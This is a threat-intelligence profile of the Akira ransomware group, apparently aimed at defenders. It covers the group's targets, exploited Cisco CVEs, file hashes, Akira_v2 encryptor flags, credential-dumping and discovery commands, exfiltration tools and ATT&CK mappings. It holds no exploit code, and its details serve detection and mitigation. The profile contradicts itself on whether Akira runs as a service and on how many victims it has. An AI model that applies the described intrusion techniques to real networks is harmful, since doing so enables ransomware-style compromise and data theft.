Executive Summary

First Identified:
March 2023

Operation Style:
is a ransomware variant and ransomware deployment entity active since at least March 2023.Akira uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement. [Akira] operations are associated with “double extortion” ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of Akira ransomware indicates multiple overlaps with and similarities to conti malware.

Extortion method:
Double Extortion – combining the traditional ransomware extortion method (encryption) with exfiltration of victim’s sensitive data; the group threatens to leak the data via a data leak site if the ransom demand is not paid.

Most Frequently Targeted Industry:
EducationFinance, Manufacturing, and Healthcare.

Most Frequently Targeted Victim HQ region:
North America, Europe, and Australia.

Known Associations:
GOLD SAHARA, PUNK SPIDER.

Description

The Akira ransomware group has been active since March 2023, targeting diverse industries across North America, the UK, and Australia. Operating as a Ransomware-as-a-Service (RaaS) model, Akira employs a double-extortion strategy by stealing sensitive data before encrypting it. According to their leak site, the group claims to have compromised over 350 organizations. 

From November 13 to 14, the Akira ransomware group posted over 30 new victims on their data leak site, marking their highest single-day total since they began operations in March 2023. This milestone represents a record-breaking escalation in their activities and the volume of leaks shared in one day.  

The Akira ransomware blog is organized into five sections. The “Leaks” section lists victims who refused to pay the ransom, leading the group to publicly release their encrypted data. The “News” section highlights new victims, likely organizations currently engaged in ransom negotiations. 

In the ‘Leaks’ section we’ve seen 3 victims that already been published on the ‘News’ section, and 29 new ones. In the ‘News’ section, we’ve seen 3 new victims. Which basically means that 32 new victims were published in the group’s DLS, and three more refused to pay the ransom and were added to the ‘Leaks’ section.

Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.

Early versions of the Akira ransomware variant were written in C++ and encrypted files with a .akira extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a .powerranges extension.  Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations) interchangeably.

The FBI, CISA, EC3, and NCSC-NL encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Previous Target: Akira

Of the 35 total posts, 25 originate from the United States. Canada accounts for two, while the remaining posts come from Uruguay, Denmark, Germany, the United Kingdom, Sweden, the Czech Republic, and Nigeria

The Business Services sector is the most frequently targeted, with 10 organizations affected. Other impacted industries include Manufacturing, Construction, Retail, Technology, Education, and Critical Infrastructure.

From November 13 to 14, the Akira ransomware group posted over 30 new victims on their data leak site, marking their highest single-day total since they began operations in March 2023.

As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.

Data Leak Site: Akira


Known Exploited CVEs

(CVE-2023-20269)

A vulnerability in the remote access VPN feature of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct a brute force attack in an attempt to identify valid username and password combinations or an authenticated, remote attacker to establish a clientless SSL VPN session with an unauthorized user. This vulnerability is due to improper separation of authentication, authorization, and accounting (AAA) between the remote access VPN feature and the HTTPS management and site-to-site VPN features.

(CVE-2020-3259)

A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to retrieve memory contents on an affected device, which could lead to the disclosure of confidential information. The vulnerability is due to a buffer tracking issue when the software parses invalid URLs that are requested from the web services interface. An attacker could exploit this vulnerability by sending a crafted GET request to the web services interface. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information. Note: This vulnerability affects only specific AnyConnect and WebVPN configurations.


Associations: Akira

PUNK SPIDER
PUNK SPIDER is the Big Game Hunting (BGH) adversary (first identified in April 2023) responsible for developing and maintaining Akira ransomware and its associated Akira dedicated leak site (DLS). Tactics, Techniques, and Procedures (TTPs) associated with Akira ransomware deployments include significant use of legitimate repurposed software and Open-Source penetration-testing tools.

GOLD SAHARA
GOLD SAHARA is a cybercrime group that deploys Akira ransomware. The first Akira victim was named on a dedicated leak site in April 2023. There is no evidence that Akira is operated as ransomware-as-a-service (RaaS), but the rate of naming victims on the Akira leak site, at around 30 a month, suggests a large group of individuals is responsible for Ransomware deployment.

GOLD SAHARA exclusively uses off-the-shelf tools and built-in utilities to conduct its operations. After compromising VPN accounts for initial access, the group uses Advanced IP Scanner and the SoftPerfect Network Scanner for network discovery, and the built-in Nltest Windows utility to identify Domain trusts and domain controllers. It uses AnyDesk and PuTTy for remote access, and the WinRAR archiving tool to stage data for exfiltration using Rclone. The group has also been observed accessing and downloading SharePoint files to use in extortion attempts. Prior to deploying ransomware, GOLD SAHARA deletes Administrator Accounts, likely to hinder recovery efforts.

Known Tools: Akira

indicates behaviors that have been observed by DarkAtlas Team.

Malicious Files Affiliated with Akira Ransomware:

File NameHash (SHA-256)Description
w.exed2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0caAkira ransomware
Win.exedcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05eAkira ransomware encryptor
AnyDesk.exebc747e3bf7b6e02c09f3d18bdd0e64eef62b940b2f16c9c72e647eec85cf0138Remote desktop application
Gcapi.dll73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffafDLL file that assists with the execution of AnyDesk.exe
Sysmon.exe1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386Ngrok tool for persistence
Config.ymlVaries by useNgrok configuration file
Rclone.exeaaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9Exfiltration tool
Winscp.rnd7d6959bb7a9482e1caa83b16ee01103d982d47c70c72fdd03708e2b7f4c552c4Network file transfer program
WinSCP-6.1.2-Setup.exe36cc31f0ab65b745f25c7e785df9e72d1c8919d35a1d7bd4ce8050c8c068b13cNetwork file transfer program
Akira_v23298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75
0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c
Akira_v2 ransomware
Megazordffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc
dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198
131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07
9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c
9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065
2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83
7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be
95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a
0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d
C9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0
Akira “Megazord” ransomware
VeeamHax.exeaaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015dPlaintext credential leaking tool
Veeam-Get-Creds.ps118051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88PowerShell script for obtaining and decrypting accounts from Veeam servers
PowershellKerberos TicketDumper5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32Kerberos ticket dumping tool from LSA cache
sshd.exe8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694OpenSSH Backdoor
ipscan-3.9.1-setup.exe892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0Network scanner that scans IP addresses and ports

Observed Akira Behaviors: Windows

Initial Access

The FBI and cybersecurity researchers have observed Akira threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured, mostly using known Cisco vulnerabilities Additional methods of initial access include the use of external-facing services such as Remote Desktop Protocol (RDP) , spear phishing Phishing,Spearphishing and the abuse of valid credentials.

Persistence and Discovery

Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence. In some instances, the FBI identified Akira threat actors creating an Administrative Account named itadm.

According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting to extract Credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS). Akira threat actors also use credential scraping tools like Mimikatz and LaZagne to aid in privilege escalation. Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes and net Windows commands are used to identify domain controllers and gather information on domain trust relationships

Defense Evasion

Based on trusted third party investigations, Akira threat actors have been observed deploying two distinct ransomware variants against different system architectures within the same compromise event. This marks a shift from recently reported Akira ransomware activity. Akira threat actors were first observed deploying the Windows-specific “Megazord” ransomware, with further analysis revealing that a second payload was concurrently deployed in this attack (which was later identified as a novel variant of the Akira ESXi encryptor, “Akira_v2”).

As Akira threat actors prepare for lateral movement, they commonly disable security software to avoid detection. Cybersecurity researchers have observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver

Exfiltration and Impact

Akira threat actors leverage tools such as FileZilla, WinRAR , WinSCP, and RClone to exfiltrate data To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDeskNgrok, and Cloudflare Tunnel. Enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega to connect to exfiltration servers.

Akira threat actors use a double-extortion model after exfiltrating data. The Akira ransom note provides each company with a unique code and instructions to contact the threat actors via .onion URL. Akira threat actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. Ransom payments are paid in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. To further apply pressure, Akira threat actors threaten to publish exfiltrated data on the Tor network, and in some instances have called Victimized companies, according to FBI reporting.

Encryption

Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange . This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption. Encrypted files are appended with either a .akira or .powerranges extension. To further inhibit system recovery, Akira’s encryptor (w.exe) utilizes PowerShell commands to delete volume shadow copies (VSS) on Windows systems . Additionally, a ransom note named fn.txt appears in both the root directory (C:) and each users’ home directory (C:\Users).

Trusted third party analysis identified that the Akira_v2 encryptor is an upgrade from its previous version, which includes additional functionalities due to the language it’s written in (Rust). Previous versions of the encryptor provided options to insert arguments at runtime, including:

  • -p --encryption_path (targeted file/folder paths)
  • -s --share_file (targeted network drive path)
  • -n --encryption_percent (percentage of encryption)
  • --fork (create a child process for encryption

The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. The new version also adds a layer of protection, utilizing the Build ID as a run condition to hinder dynamic analysis. The encryptor is unable to execute successfully without the unique Build ID. The ability to deploy against only virtual machines using “vmonly” and the ability to stop running virtual machines with “stopvm” functionalities have also been observed implemented for Akira_v2. After encryption, the Linux ESXi variant may include the file extension “akiranew” or add a ransom note named “akiranew.txt” in directories where files were encrypted with the new nomenclature.

MITRE ATT&CK® Mappings: Akira

Techniques Used

Table 1: Initial Access

Technique TitleIDUse
Valid AccountsT1078Akira threat actors obtain and abuse credentials of existing accounts as a means of gaining initial access.
Exploit Public Facing ApplicationT1190Akira threat actors exploit vulnerabilities in internet-facing systems to gain access to systems.
External Remote ServicesT1133Akira threat actors have used remote access services, such as RDP/VPN connection to gain initial access.
Phishing: Spearphishing AttachmentT1566.001Akira threat actors use phishing emails with malicious attachments to gain access to networks.
Phishing: Spearphishing LinkT1566.002Akira threat actors use phishing emails with malicious links to gain access to networks.

Table 2: Credential Access

Technique TitleIDUse
OS Credential DumpingT1003Akira threat actors use tools like Mimikatz and LaZagne to dump credentials.
OS Credential Dumping: LSASS MemoryT1003.001Akira threat actors attempt to access credential material stored in the process memory of the LSASS.

Table 3: Discovery

Technique TitleIDUse
System Network Configuration DiscoveryT1016Akira threat actors use tools to scan systems and identify services running on remote hosts and local network infrastructure.
System Information DiscoveryT1082Akira threat actors use tools like PCHunter64 to acquire detailed process and system information.
Domain Trust DiscoveryT1482Akira threat actors use the net Windows command to enumerate domain information.
Process DiscoveryT1057Akira threat actors use the Tasklist utility to obtain details on running processes via PowerShell.
Permission Groups Discovery: Local GroupsT1069.001Akira threat actors use the net localgroup /dom to find local system groups and permission settings.
Permission Groups Discovery: Domain GroupsT1069.002Akira threat actors use the net group /domain command to attempt to find domain level groups and permission settings.
Remote System DiscoveryT1018Akira threat actors use nltest /dclist to amass a listing of other systems by IP address, hostname, or other logical identifiers on a network.

Table 4: Persistence

Technique TitleIDUse
Create Account: Domain AccountT1136.002Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence.

Table 5: Defense Evasion

Technique TitleIDUse
Impair Defenses: Disable or Modify ToolsT1562.001Akira threat actors use BYOVD attacks to disable antivirus software.

Table 6: Command and Control

Technique TitleIDUse
Remote Access SoftwareT1219Akira threat actors use legitimate desktop support software like AnyDesk to obtain remote access to victim systems.
ProxyT1090Akira threat actors utilized Ngrok to create a secure tunnel to servers that aided in exfiltration of data.

Table 7: Collection

Technique TitleIDUse
Archive Collected Data: Archive via UtilityT1560.001Akira threat actors use tools like WinRAR to compress files.

Table 8: Exfiltration

Technique TitleIDUse
Exfiltration Over Alternative ProtocolT1048Akira threat actors use file transfer tools like WinSCP to transfer data.
Transfer Data to Cloud AccountT1537Akira threat actors use tools like CloudZilla to exfiltrate data to a cloud account and connect to exfiltration servers they control.
Exfiltration Over Web Service: Exfiltration to Cloud StorageT1567.002Akira threat actors leveraged RClone to sync files with cloud storage services to exfiltrate data.

Table 9: Impact

Technique TitleIDUse
Data Encrypted for ImpactT1486Akira threat actors encrypt data on target systems to interrupt availability to system and network resources.
Inhibit System RecoveryT1490Akira threat actors delete volume shadow copies on Windows systems.
Financial TheftT1657Akira threat actors use a double-extortion model for financial gain.

Conclusion

The Akira ransomware group has emerged as a formidable threat since its first appearance in March 2023, targeting over 250 organizations and amassing approximately $42 million in ransomware proceeds. Operating under a double-extortion model, Akira combines data encryption with the exfiltration of sensitive information, pressuring victims to pay by threatening public exposure. The group’s tactics involve leveraging compromised VPN credentials and known vulnerabilities in Cisco products to gain initial access, followed by network reconnaissance, privilege escalation, and data exfiltration using widely available tools such as AnyDesk, RClone and WinSCP.

The ransomware has evolved over time, initially written in C++ and later incorporating Rust-based code in the Megazord variant. This shift reflects the group’s commitment to enhancing encryption speed and resilience against detection. The targeting of diverse industries, including business services, Manufacturing, Technology, and critical infrastructure, highlights the widespread and indiscriminate nature of Akira’s operations.

To mitigate the threat posed by Akira ransomware, organizations are urged to strengthen their cybersecurity posture by implementing multi-factor authentication (MFA), securing VPN access, and maintaining regular data backups. The Akira group’s rapid adaptation to defensive measures underscores the need for continuous monitoring and proactive threat intelligence to stay ahead of this evolving threat landscape.